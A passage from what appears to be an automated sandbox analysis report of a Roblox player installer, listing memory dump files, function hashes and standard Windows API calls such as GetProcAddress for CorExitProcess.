                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: e4a8bf5ef88d9f2dd6ec09d213b71d30bb2e76f3bef5a41d5e0c14e9562a7e61
                                                                              • Instruction ID: f6fb55cdf604a27daa8585bbee0ce9134016fb537e8df4a03174729ae36b0afb
                                                                              • Opcode Fuzzy Hash: e4a8bf5ef88d9f2dd6ec09d213b71d30bb2e76f3bef5a41d5e0c14e9562a7e61
                                                                              • Instruction Fuzzy Hash: B941C8B0E2020AABCF20DF6DD884AAE7FB9EF84714F148055EE145B355D771EA51CBA0
                                                                              Function 012543CE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5727C2D5,?,?,00000000,0127D7FB,000000FF,?,012543A1,00000002,?,01254375,0124466F), ref: 01254403
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01254415
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,0127D7FB,000000FF,?,012543A1,00000002,?,01254375,0124466F), ref: 01254437
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: a69f135966f2d949213b6dede3394bada137f7385df847e1fbe65c05edcb03cf
                                                                              • Instruction ID: e5f7ae3f9c7b6c7df58c75029da46fd418a89b8cd88b1eb3d1fadf4f72aa4144
                                                                              • Opcode Fuzzy Hash: a69f135966f2d949213b6dede3394bada137f7385df847e1fbe65c05edcb03cf
                                                                              • Instruction Fuzzy Hash: 5101DB35554669EFDB219F54EC09FAEBFB8FB04B55F004529FD11A2690EB749900CB40